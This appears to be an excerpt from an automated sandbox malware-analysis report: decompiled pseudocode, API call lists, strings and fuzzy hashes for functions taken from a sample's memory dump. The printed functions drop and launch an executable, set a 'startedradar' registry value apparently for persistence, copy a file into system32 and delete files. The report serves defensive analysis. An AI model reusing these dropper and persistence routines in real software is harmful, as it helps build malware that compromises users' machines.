0x00118926
0x00118930
0x0011893a
0x00118944
0x0011894e
0x00118958
0x00118962
0x0011896c
0x00118976
0x00118980
0x0011898a
0x00118994
0x0011899e
0x001189a8
0x001189b2
0x001189bc
0x001189c6
0x001189d0
0x001189d7
0x001189de
0x001189e5
0x001189ec
0x001189f3
0x001189fa
0x00118a01
0x00118a08
0x00118a0f
0x00118a16
0x00118a1d
0x00118a24
0x00118a2b
0x00118a32
0x00118a39
0x00118a40
0x00118a47
0x00118a58
0x00118a64
0x00118a6b
0x00118a72
0x00118a79
0x00118a80
0x00118a87
0x00118a8e
0x00118a95
0x00118a9c
0x00118aa3
0x00118aaa
0x00118ab1
0x00118ab8
0x00118ac7
0x00118ad3
0x00118adf
0x00118ae5
0x00118aeb
0x00118aee
0x00118af6
0x00118afb
0x00118afc
0x00118afd
0x00118afe
0x00118aff
0x00118b00
0x00118b01
0x00118b02
0x00118b03
0x00118b04
0x00118b16
0x00118af0
0x00118af0
0x00118af5
0x00118af5

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00118ACA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00118AD8
HeapFree.KERNEL32(00000000), ref: 00118ADF

Strings

_2D,, xrefs: 001186EC
!, xrefs: 001184B2
^Nf, xrefs: 0011885E

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: !$^Nf$_2D,
API String ID: 872250060-2687564766
Opcode ID: c40f3ddfee3b0d102d1cf4dc9f3625b463b89194dc56f96e6b5d8ec4b9962a45
Instruction ID: 6b98ca075c0b1988f762e5374104c39e117d4c4d20228f455e8b4568fe1da26c
Opcode Fuzzy Hash: c40f3ddfee3b0d102d1cf4dc9f3625b463b89194dc56f96e6b5d8ec4b9962a45
Instruction Fuzzy Hash: ABE1B7B4C1636DDBDB60DF829A897CDBB70BB16300F6086C9C5993A314CB750A86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 0012000F, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47stringfileCOMMON

APIs

lstrcpyW.KERNEL32 ref: 0012001D
lstrlenW.KERNEL32(?), ref: 0012002A
GetTickCount.KERNEL32 ref: 00120040
CreateFileW.KERNEL32(0065002E,40000000), ref: 00120099

Strings

., xrefs: 0012006F
x, xrefs: 0012007A

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CountCreateFileTicklstrcpylstrlen
String ID: .$x
API String ID: 3921185036-1654958672
Opcode ID: f3061648731ca94013c425392447dbb01b3024f727b8605736cfea39c062886b
Instruction ID: 348d876b92ed949c17937cb453c4dfd484ca770df9a6b98b46df4b7dd18db3a9
Opcode Fuzzy Hash: f3061648731ca94013c425392447dbb01b3024f727b8605736cfea39c062886b
Instruction Fuzzy Hash: 8601D471904608AFD7608F60DC8CBEE3669EF04354F204265E90AD7AA0DF318D96CB80

Uniqueness

Uniqueness Score: 3.75%

Function 00120372, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45filestringCOMMON

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000), ref: 00120384
lstrlenW.KERNEL32(?), ref: 00120391
GetTickCount.KERNEL32 ref: 001203A7
CreateFileW.KERNEL32(0065002E,40000000,00000000,00000000), ref: 00120408

Strings

x, xrefs: 001203E1
., xrefs: 001203D4

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CountCreateFileFolderPathTicklstrlen
String ID: .$x
API String ID: 2156814356-1654958672
Opcode ID: 279abd92024b0587aafae6135770fb195d8372f6a538ac20b67ae5ebfcbb88fd
Instruction ID: cda24e8ee4cb60f665eafc929564e608ea1242f38dbd823d26622fd3724b5239
Opcode Fuzzy Hash: 279abd92024b0587aafae6135770fb195d8372f6a538ac20b67ae5ebfcbb88fd
Instruction Fuzzy Hash: D9118471640618BBE7208FA0EC8DB9A3661BB0C710F1442A4EA09EB6D1DB74DA558BC4

Uniqueness

Uniqueness Score: 3.75%

Function 00120242, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
filestringCOMMON

C-Code - Quality: 23%

			E00120242(void* __eax, void* __ecx) {
				int _t36;
				int _t37;
				void* _t43;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t54;
				void* _t57;

				_t43 = __ecx;
				 *0x125a94(0, 0x23, 0, 0, __eax);
				_t48 = lstrlenW(_t57 - 0x268);
				 *((short*)(_t57 + _t48 * 2 - 0x268)) = 0x5c;
				_t49 = _t48 + 1;
				_t54 = (GetTickCount() & 0x0000000f) + 4;
				L00111FD0( &((_t57 - 0x268)[_t49]), _t54);
				_t50 = _t49 + _t54;
				 *((intOrPtr*)(_t57 + _t50 * 2 - 0x268)) = 0x65002e;
				 *((intOrPtr*)(_t57 + _t50 * 2 - 0x264)) = 0x650078;
				 *((short*)(_t57 + _t50 * 2 - 0x260)) = 0;
				 *((intOrPtr*)(_t57 - 4)) =  *((intOrPtr*)(_t43 + 4));
				_t36 = CreateFileW(_t57 - 0x268, 0x40000000, 0, 0, 2, 0x80, 0);
				_t51 = _t36;
				if(_t51 != 0xffffffff) {
					goto 0x312019;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t37 = WriteFile();
					_t36 = CloseHandle(_t51);
					if(_t37 != 0) {
						goto 0x312032;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t57 - 0x60) = 0x44;
						_t36 = CreateProcessW(_t57 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t57 - 0x60, _t57 - 0x14);
						if(_t36 != 0) {
							CloseHandle( *(_t57 - 0x14));
							_t36 = CloseHandle( *(_t57 - 0x10));
						}
					}
				}
				goto 0x312048;
				asm("int3");
				return _t36;
			}

0x00120242
0x0012024d
0x00120260
0x00120267
0x0012026f
0x00120284
0x00120289
0x00120290
0x0012029d
0x001202aa
0x001202b5
0x001202c2
0x001202d1
0x001202d7
0x001202dc
0x001202de
0x001202e3
0x001202e4
0x001202e5
0x001202e6
0x001202e7
0x001202e8
0x001202e9
0x001202f2
0x001202fa
0x001202fc
0x00120301
0x00120302
0x00120303
0x00120304
0x0012030d
0x00120331
0x00120339
0x0012033e
0x00120347
0x00120347
0x00120339
0x001202fa
0x0012034d
0x00120352
0x00120353

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000), ref: 0012024D
lstrlenW.KERNEL32(?), ref: 0012025A
GetTickCount.KERNEL32 ref: 00120270
CreateFileW.KERNEL32(0065002E,40000000,00000000,00000000), ref: 001202D1

Strings

x, xrefs: 001202AA
., xrefs: 0012029D

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CountCreateFileFolderPathTicklstrlen
String ID: .$x
API String ID: 2156814356-1654958672
Opcode ID: 01c301525570996c7a1aaa214d979a61421768bb3e258f8ad217bc1ddab56c88
Instruction ID: 1be2e771018f8d357f89441c74a0df9acc13d6466519e2eedafee04d571367e0
Opcode Fuzzy Hash: 01c301525570996c7a1aaa214d979a61421768bb3e258f8ad217bc1ddab56c88
Instruction Fuzzy Hash: 4601B971644719ABE7208F60DC4DB9A3661FB08711F1403A4EA09DF6D0DB719E85CB84

Uniqueness

Uniqueness Score: 3.75%

Function 0012018C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39
registrymemoryCOMMON

C-Code - Quality: 68%

			E0012018C(signed int __edi, void* __esi, void* __eflags) {
				int _t11;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t23;

				asm("popfd");
				asm("int3");
				_t21 = L00111D00(_t16, _t17, __edi);
				if(RegCreateKeyExW(0x80000001, _t21, 0, 0, 0, 2, 0, _t23 - 4, 0) == 0) {
					RegSetValueExW( *(_t23 - 4), "startedradar", 0, 1, _t23 - 0x20c, 2 + __edi * 2);
					RegCloseKey( *(_t23 - 4));
				}
				_t11 = HeapFree(GetProcessHeap(), 0, _t21);
				return _t11;
			}

0x0012018c
0x0012018d
0x00120196
0x001201b6
0x001201d3
0x001201dc
0x001201dc
0x001201ec
0x001201f7

APIs

RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 001201AE
RegSetValueExW.ADVAPI32(?,startedradar,00000000,00000001,?,00000000), ref: 001201D3
RegCloseKey.ADVAPI32(?), ref: 001201DC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001201E5
HeapFree.KERNEL32(00000000), ref: 001201EC

Strings

startedradar, xrefs: 001201CB

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$CloseCreateFreeProcessValue
String ID: startedradar
API String ID: 3386933116-1774226336
Opcode ID: 5af0d34fa31f79009bb18b12355081e119640cd1ed60305c20e77b59a6c00281
Instruction ID: 93883f40a664a5a26fe3eee21fe84de7cde9765b6a8b263e67cf2a1b44b3f451
Opcode Fuzzy Hash: 5af0d34fa31f79009bb18b12355081e119640cd1ed60305c20e77b59a6c00281
Instruction Fuzzy Hash: 59F09072680218BBEB309B90AC0FFDE3728EB04752F200161F706A98D1D7A19AA18795

Uniqueness

Uniqueness Score: 7.75%

Function 001110C3, Relevance: 10.5, APIs: 7, Instructions: 36memoryUNIQUE

APIs

_snwprintf.NTDLL ref: 001110E2
GetProcessHeap.KERNEL32(?,00000000), ref: 001110ED
HeapFree.KERNEL32(00000000,?,00000000), ref: 001110F4
CreateEventW.KERNEL32(?,00000001,?,?,?,00000000), ref: 00111105
SetEvent.KERNEL32(00000000,?,00000001,?,?,?,00000000), ref: 00111112
CloseHandle.KERNEL32(00000000), ref: 00111119
CloseHandle.KERNEL32(00000000), ref: 00111125

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseEventHandleHeap$CreateFreeProcess_snwprintf
String ID:
API String ID: 1176111436-0
Opcode ID: 90291cc5bd0a69bb2fe1cb682ce3ca2df01fe91f05d6095e77d67e243b87266d
Instruction ID: 606b7eb303849556c8c5f4b7fe9e7714738285b03d432e8393536a8c089d56a3
Opcode Fuzzy Hash: 90291cc5bd0a69bb2fe1cb682ce3ca2df01fe91f05d6095e77d67e243b87266d
Instruction Fuzzy Hash: E3F0F672801514FBCB325BB09C4CFEF7A3DEF49701F000455FA09A2651DB3589E28B65

Uniqueness

Uniqueness Score: 23.02%

Function 0011FF8F, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 23
processUNIQUE

C-Code - Quality: 33%

			E0011FF8F() {
				int _t9;
				void* _t11;

				memset();
				 *(_t11 - 0x58) = 0x44;
				_t9 = CreateProcessW("C:\Windows\system32\startedradar.exe", 0, 0, 0, 0, 0, 0, 0, _t11 - 0x58, _t11 - 0x10);
				if(_t9 != 0) {
					CloseHandle( *(_t11 - 0x10));
					_t9 = CloseHandle( *(_t11 - 0xc));
				}
				goto 0x311ef4;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return _t9;
			}

0x0011ff8f
0x0011ff98
0x0011ffba
0x0011ffc2
0x0011ffc7
0x0011ffd0
0x0011ffd0
0x0011ffd6
0x0011ffdb
0x0011ffdc
0x0011ffdd
0x0011ffde
0x0011ffdf

APIs

memset.NTDLL ref: 0011FF8F
CreateProcessW.KERNEL32(C:\Windows\system32\startedradar.exe,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0011FFBA
CloseHandle.KERNEL32(?), ref: 0011FFC7
CloseHandle.KERNEL32(?), ref: 0011FFD0

Strings

D, xrefs: 0011FF98
C:\Windows\system32\startedradar.exe, xrefs: 0011FFB5

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: C:\Windows\system32\startedradar.exe$D
API String ID: 657545203-196031280
Opcode ID: 0954d08e6e098ce0e4917923762b33d35bb6f6c9074b507bf5d6062ebfb0c1be
Instruction ID: 2810e288d802f9ed442ab84de204ba5725f89fb62669cac8b29c52cd38016ad1
Opcode Fuzzy Hash: 0954d08e6e098ce0e4917923762b33d35bb6f6c9074b507bf5d6062ebfb0c1be
Instruction Fuzzy Hash: CAE0EC72904149FFDB259FD0EC48BEE7F79BB04745F104829E612A58A0D77049E68F25

Uniqueness

Uniqueness Score: 100.00%

Function 0011F69E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20
memoryUNIQUE

C-Code - Quality: 50%

			E0011F69E(void* __esi) {
				void* _t2;
				void* _t8;
				void* _t10;

				 *0x125a94();
				_t2 = L00111D00(0x124660, 0x1cc, _t8);
				_t10 = _t2;
				 *0x1259dc("C:\Windows\system32", 0x104, _t10, "C:\Windows\system32", "startedradar", 0x67165621);
				return HeapFree(GetProcessHeap(), 0, _t10);
			}

0x0011f69e
0x0011f6b3
0x0011f6c2
0x0011f6cf
0x0011f6e9

APIs

SHGetFolderPathW.SHELL32 ref: 0011F69E
_snwprintf.NTDLL ref: 0011F6CF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F6DB
HeapFree.KERNEL32(00000000), ref: 0011F6E2

Strings

startedradar, xrefs: 0011F6B8
C:\Windows\system32, xrefs: 0011F6BD, 0011F6CA

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FolderFreePathProcess_snwprintf
String ID: C:\Windows\system32$startedradar
API String ID: 165911164-1721908697
Opcode ID: 622abf17508626e09f473e1437feb5d1a81fc487d0916cec07ec2ffb3978254b
Instruction ID: b8042e963c0a5c5384d1b63ab48ab1ff9ab7b72617cd4cde24e4dbba1fbd10ae
Opcode Fuzzy Hash: 622abf17508626e09f473e1437feb5d1a81fc487d0916cec07ec2ffb3978254b
Instruction Fuzzy Hash: 66E01231686720BBD72027A47D8EF9A3915EB657A3F004050F605599D2CBB108F287A5

Uniqueness

Uniqueness Score: 100.00%

Function 00120487, Relevance: 9.0, APIs: 6, Instructions: 33
memoryCOMMON

C-Code - Quality: 37%

			E00120487(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t17;
				void* _t20;
				void* _t25;
				void* _t26;

				_t20 = __ecx;
				asm("popfd");
				asm("int3");
				_t25 = L00111D00(__ecx, __edx, __edi);
				 *0x1259dc(_t26 - 0x428, 0x104, _t25, _t26 - 0x220);
				HeapFree(GetProcessHeap(), 0, _t25);
				_push(_t26 - 0x18);
				_push( *(_t26 - 8));
				_push(_t20);
				if(L00111F00(_t26 - 0x428) != 0) {
					CloseHandle( *(_t26 - 0x18));
					CloseHandle( *(_t26 - 0x14));
				}
				_t17 = CloseHandle( *(_t26 - 8));
				goto 0x3120e5;
				asm("int3");
				return _t17;
			}

0x00120487
0x00120487
0x00120488
0x0012048e
0x001204a4
0x001204b7
0x001204c0
0x001204c1
0x001204ca
0x001204d5
0x001204da
0x001204e3
0x001204e3
0x001204ec
0x001204f2
0x001204f7
0x001204f8

APIs

_snwprintf.NTDLL ref: 001204A4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001204B0
HeapFree.KERNEL32(00000000), ref: 001204B7
CloseHandle.KERNEL32(?), ref: 001204DA
CloseHandle.KERNEL32(?), ref: 001204E3
CloseHandle.KERNEL32(?), ref: 001204EC

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseHandle$Heap$FreeProcess_snwprintf
String ID:
API String ID: 3500179031-0
Opcode ID: 985421ab8d42f5a86c5b2f9e5df303b5bb79de36e0e38a03d73ab2375606273c
Instruction ID: 9876423759d6108e0dd7749182e8501d324e1f31218811cf365ea19add5a0f9c
Opcode Fuzzy Hash: 985421ab8d42f5a86c5b2f9e5df303b5bb79de36e0e38a03d73ab2375606273c
Instruction Fuzzy Hash: 6DF0FFB2800119FBCB216BE0EC49EEE7F39AF08346F004851F605A5461D7318AE5CFA0

Uniqueness

Uniqueness Score: 4.01%

Function 001111F3, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

C-Code - Quality: 39%

			E001111F3(void* __edi) {
				void* __esi;
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				_t17 = __edi;
				GetModuleFileNameW(??, ??, ??);
				_push(_t21 - 0x18);
				_push(0x80);
				if(L00111E80(_t19) != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					CloseHandle( *(_t21 - 0x18));
					CloseHandle( *(_t21 - 0x14));
				}
				CloseHandle(_t19);
				CloseHandle(_t14);
				return _t17;
			}

0x001111f3
0x001111f3
0x001111fc
0x001111fd
0x00111212
0x00111217
0x00111220
0x00111229
0x00111229
0x00111230
0x00111237
0x00111245

APIs

GetModuleFileNameW.KERNEL32 ref: 001111F3
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00111217
CloseHandle.KERNEL32(?), ref: 00111220
CloseHandle.KERNEL32(?), ref: 00111229
CloseHandle.KERNEL32 ref: 00111230
CloseHandle.KERNEL32 ref: 00111237

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: e7f6c8ebf42bd4a323663686596f0369699ce9e887142826a818d5b760cc997b
Instruction ID: f6897585a04ff105c770620dbf2783fe063448b38e7947f397027c64c7a94f07
Opcode Fuzzy Hash: e7f6c8ebf42bd4a323663686596f0369699ce9e887142826a818d5b760cc997b
Instruction Fuzzy Hash: 31E0C033601019FBCB116BE4EC499DDBF39EB54612F104562FA15D15A0DB3145E68F61

Uniqueness

Uniqueness Score: 0.01%

Function 000F2F8A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97windowCOMMON

APIs

LoadIconA.USER32 ref: 000F2FE3
LoadImageA.USER32 ref: 000F30AA

Strings

0, xrefs: 000F2FA3
MainMenu, xrefs: 000F3036
MainWClass, xrefs: 000F3030

Memory Dump Source

Source File: 00000007.00000002.1686856986.000F0000.00000040.sdmp, Offset: 000F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f0000_810.jbxd

Similarity

API ID: Load$IconImage
String ID: 0$MainMenu$MainWClass
API String ID: 666102371-1064549320
Opcode ID: c25ebf9f950ae9a2ce910f9ee57ea336e570cb205e64e3e7abdbbd1ca5c8fb28
Instruction ID: 3f5144880060dcfa1247995dfe3fedace56dec1203eed5068613a3b68df74235
Opcode Fuzzy Hash: c25ebf9f950ae9a2ce910f9ee57ea336e570cb205e64e3e7abdbbd1ca5c8fb28
Instruction Fuzzy Hash: 3841F5B0D003188FEB14DFA9E84539EBBF4FB48304F10852AE919AB754D779A909CF91

Uniqueness

Uniqueness Score: 3.75%

Function 00111E91, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38
processCOMMON

C-Code - Quality: 48%

			E00111E91(WCHAR* __esi) {
				int _t11;
				void* _t20;

				memset();
				 *(_t20 - 0x58) = 0x44;
				_t11 = CreateProcessW(__esi, 0, 0, 0, 0,  *(_t20 + 8), 0, 0, _t20 - 0x58, _t20 - 0x10);
				if(_t11 == 0) {
					goto 0x3105fe;
					asm("int3");
					return _t11;
				} else {
					if( *((intOrPtr*)(_t20 + 0xc)) == 0) {
						CloseHandle( *(_t20 - 0x10));
						CloseHandle( *(_t20 - 0xc));
						return 1;
					} else {
						asm("movdqu xmm0, [ebp-0x10]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x00111e91
0x00111e9a
0x00111eb9
0x00111ec1
0x00111ef9
0x00111efe
0x00111eff
0x00111ec3
0x00111ec8
0x00111ee0
0x00111ee9
0x00111ef8
0x00111eca
0x00111eca
0x00111ecf
0x00111edc
0x00111edc
0x00111ec8

APIs

memset.NTDLL ref: 00111E91
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00111EB9
CloseHandle.KERNEL32(?), ref: 00111EE0
CloseHandle.KERNEL32(?), ref: 00111EE9

Strings

D, xrefs: 00111E9A

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 8e3a809d7bd7f629000cb6199042c37d82b4ff83113b6cfdf4fd24c58a83883f
Instruction ID: e5166c0f053b4a6b23de80ae6af563faa93b28df7d5e51bebba05e8ab9d0508d
Opcode Fuzzy Hash: 8e3a809d7bd7f629000cb6199042c37d82b4ff83113b6cfdf4fd24c58a83883f
Instruction Fuzzy Hash: 6FF06231A40249BBEF214FD8EC05BED7B78FB04700F104556FE04A95D0D7B595E18B54

Uniqueness

Uniqueness Score: 0.08%

Function 0011FBF6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27
UNIQUE

C-Code - Quality: 28%

			E0011FBF6(void* __ecx, void* __edi, short __esi) {
				int _t38;
				void* _t41;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t50;

				_t42 = __edi;
				_t40 = __ecx;
				GetTempPathW(??, ??);
				GetTempFileNameW(_t47 - 0x228, 0, 0, _t47 - 0x228);
				memset(_t47 - 0x20, 0, 0x1e);
				_t50 = _t49 + 0xc;
				 *((intOrPtr*)(_t47 - 0x1c)) = 1;
				 *((intOrPtr*)(_t47 - 0x18)) = 0x127ee0;
				 *((intOrPtr*)(_t47 - 0x14)) = _t47 - 0x228;
				 *((short*)(_t47 - 0x10)) = __esi;
				if(SHFileOperationW(_t47 - 0x20) == 0 &&  *((intOrPtr*)(_t47 - 0xe)) == __edi) {
					goto 0x311dba;
					asm("int3");
					asm("int3");
					memset();
					_t50 = _t50 + 0xc;
					 *((intOrPtr*)(_t47 - 0x1c)) = 1;
					 *((intOrPtr*)(_t47 - 0x18)) = 0x1283f8;
					 *((intOrPtr*)(_t47 - 0x14)) = 0x127ee0;
					 *((short*)(_t47 - 0x10)) = __esi;
					_t38 = SHFileOperationW(_t47 - 0x20);
					if(_t38 != 0 ||  *((intOrPtr*)(_t47 - 0xe)) != __edi) {
						_t40 = _t47 - 0x228;
						_t42 = 0;
						L001112F0(_t38, _t47 - 0x228, _t41);
					} else {
						_t16 = _t38 + 1; // 0x1
						_t42 = _t16;
					}
				}
				goto 0x311de2;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("popfd");
				asm("int3");
				_t45 = L00111D00(_t40, _t41, _t42);
				 *0x1259dc(_t47 - 0x430, 0x104, _t45, "C:\Windows\system32\startedradar.exe");
				HeapFree(GetProcessHeap(), 0, _t45);
				DeleteFileW(_t47 - 0x430); // executed
				return _t42;
			}

0x0011fbf6
0x0011fbf6
0x0011fbf6
0x0011fc08
0x0011fc16
0x0011fc1c
0x0011fc1f
0x0011fc2c
0x0011fc33
0x0011fc39
0x0011fc46
0x0011fc4d
0x0011fc52
0x0011fc53
0x0011fc54
0x0011fc5a
0x0011fc5d
0x0011fc67
0x0011fc6e
0x0011fc75
0x0011fc7a
0x0011fc82
0x0011fc93
0x0011fc99
0x0011fc9b
0x0011fc89
0x0011fc89
0x0011fc89
0x0011fc89
0x0011fc82
0x0011fca0
0x0011fca5
0x0011fca6
0x0011fca7
0x0011fca8
0x0011fca9
0x0011fcaa
0x0011fcab
0x0011fcac
0x0011fcad
0x0011fcae
0x0011fcb4
0x0011fcc8
0x0011fcdb
0x0011fce8
0x0011fcf5

APIs

GetTempPathW.KERNEL32 ref: 0011FBF6
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0011FC08
memset.NTDLL ref: 0011FC16
SHFileOperationW.SHELL32(?), ref: 0011FC3E

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011FC2C

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: FileTemp$NameOperationPathmemset
String ID: C:\Windows\system32\startedradar.exe
API String ID: 1645034579-941650888
Opcode ID: 10c04cc8c9a8a29479e2c8e03066284e20e1f106f223d92cdbd45353349791eb
Instruction ID: 8d77ff37185710f5906d7eafcf40da61521e0b3e9561074813905bae4fcdab31
Opcode Fuzzy Hash: 10c04cc8c9a8a29479e2c8e03066284e20e1f106f223d92cdbd45353349791eb
Instruction Fuzzy Hash: BEF0177084020DEBDF208B90EC48BEEBBB8BB08355F100466E605A6550E77496D58B95

Uniqueness

Uniqueness Score: 100.00%

Function 001200CE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
processCOMMON

C-Code - Quality: 61%

			E001200CE() {
				int _t11;
				void* _t13;

				memset();
				 *(_t13 - 0x60) = 0x44;
				_t11 = CreateProcessW(_t13 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x60, _t13 - 0x18);
				if(_t11 != 0) {
					CloseHandle( *(_t13 - 0x18));
					_t11 = CloseHandle( *(_t13 - 0x14));
				}
				goto 0x311f61;
				asm("int3");
				return _t11;
			}

0x001200ce
0x001200d7
0x001200fb
0x00120103
0x00120108
0x00120111
0x00120111
0x00120117
0x0012011c
0x0012011d

APIs

memset.NTDLL ref: 001200CE
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001200FB
CloseHandle.KERNEL32(?), ref: 00120108
CloseHandle.KERNEL32(?), ref: 00120111

Strings

D, xrefs: 001200D7

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
